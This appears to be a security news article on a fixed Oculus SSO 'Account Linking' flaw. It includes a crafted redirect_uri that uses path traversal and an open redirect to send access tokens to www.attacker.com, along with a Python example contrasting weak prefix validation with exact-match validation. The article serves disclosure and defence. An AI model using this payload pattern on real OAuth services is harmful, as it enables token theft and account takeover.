Oculus Account Takeover: Oculus SSO “Account Linking” Bug Exposes Users to Account Takeover
A critical security vulnerability in Oculus's "Account Linking" feature, discovered by bug hunter Youssef Sammouda, put users at risk of account takeover on third-party websites and in VR games and apps. The bug was reported on February 26, 2021, acknowledged by Facebook on March 2, 2021, and fixed on March 16, 2021.
The vulnerability allowed an attacker to tamper with the callback endpoint so that the Oculus access token was delivered to a site under the attacker's control, potentially leading to account takeover. It was possible because the SSO endpoint did not require the redirect_uri parameter to match the organization's registered SSO settings exactly (in effect, a value that merely started with the registered callback was accepted) and did not filter path-traversal characters out of the value, so the browser could be sent to a different path on the callback host than the one that was registered.
To exploit this bug, an attacker could modify the redirect_uri parameter, for example, from:
https://auth.oculus.com/sso/?redirect_uri=https://forums.oculusvr.com/hucou38897/plugins/custom/facebook/fboculus/custom.oauthsso-redirect&organization_id=695304644729285
to:
https://auth.oculus.com/sso/?redirect_uri=https://forums.oculusvr.com/hucou38897/plugins/custom/facebook/fboculus/custom.oauthsso-redirect/../../../../../../open_redirect?next=https://www.attacker.com&organization_id=695304644729285
Because the appended ../ segments are resolved by the browser, the request lands on an open redirect on forums.oculusvr.com whose next parameter forwards it, access token included, to www.attacker.com. The attacker could then use the token to log in to the victim's Oculus account and, through Account Linking, potentially reach other linked accounts in VR games and apps.
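To make the failure concrete, here is an added example (not code from the write-up or from Oculus) that puts a prefix-style redirect_uri check beside an exact-match check, and resolves the dot-segments the way a browser would. The registered callback and the two request URIs are the ones quoted above; the function names and the hardening rules are assumptions for illustration.

```python
"""Added example: weak vs. hardened redirect_uri validation.

The registered callback and the two request URIs are the ones quoted in the
article; the checks themselves are illustrative, not Oculus's real code.
"""
import posixpath
from urllib.parse import urlsplit, urlunsplit

# Registered callback for the organization (value quoted in the article).
REGISTERED = ("https://forums.oculusvr.com/hucou38897/plugins/custom/facebook/"
              "fboculus/custom.oauthsso-redirect")

# Constructed request values: the legitimate one and the traversal payload.
LEGIT = REGISTERED
MALICIOUS = REGISTERED + "/../../../../../../open_redirect?next=https://www.attacker.com"


def prefix_check(redirect_uri: str) -> bool:
    """The weak check: anything that starts with the registered value passes."""
    return redirect_uri.startswith(REGISTERED)


def browser_view(redirect_uri: str) -> str:
    """Where the browser actually ends up once '..' segments are resolved."""
    parts = urlsplit(redirect_uri)
    # posixpath.normpath collapses '.' and '..' the same way RFC 3986
    # remove_dot_segments does for a path that starts at the root.
    resolved_path = posixpath.normpath(parts.path)
    return urlunsplit((parts.scheme, parts.netloc, resolved_path, parts.query, ""))


def exact_check(redirect_uri: str) -> bool:
    """Hardened check: HTTPS only, no dot-segments, no query or fragment,
    and the normalized value must equal the registered callback exactly."""
    parts = urlsplit(redirect_uri)
    if parts.scheme != "https":
        return False
    if any(seg in (".", "..") for seg in parts.path.split("/")):
        return False
    if parts.query or parts.fragment:
        return False
    normalized = urlunsplit(
        (parts.scheme, parts.netloc.lower(), posixpath.normpath(parts.path), "", "")
    )
    return normalized == REGISTERED


if __name__ == "__main__":
    for label, uri in (("legit", LEGIT), ("malicious", MALICIOUS)):
        print(f"{label:9} prefix_check={prefix_check(uri)} "
              f"exact_check={exact_check(uri)} -> {browser_view(uri)}")
```

Running the block shows the prefix check accepting both URIs while the browser resolves the malicious one to https://forums.oculusvr.com/open_redirect?next=https://www.attacker.com; the exact check rejects it because of the ".." segments and the query string before it ever compares hostnames.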
Sammouda notes that this type of bug is common in OAuth authentication flows and emphasizes the importance of checking for small, common issues before looking for complex ones. Facebook has since fixed the issue and awarded Sammouda a $12,000 bounty, including a bonus, for the discovery.
This incident highlights the importance of thorough security testing and responsible disclosure in ensuring the safety and security of users’ accounts. By working together with security researchers like Sammouda, companies can identify and address vulnerabilities before they can be exploited by malicious actors.
Link to read full write up: https://ysamm.com/?p=697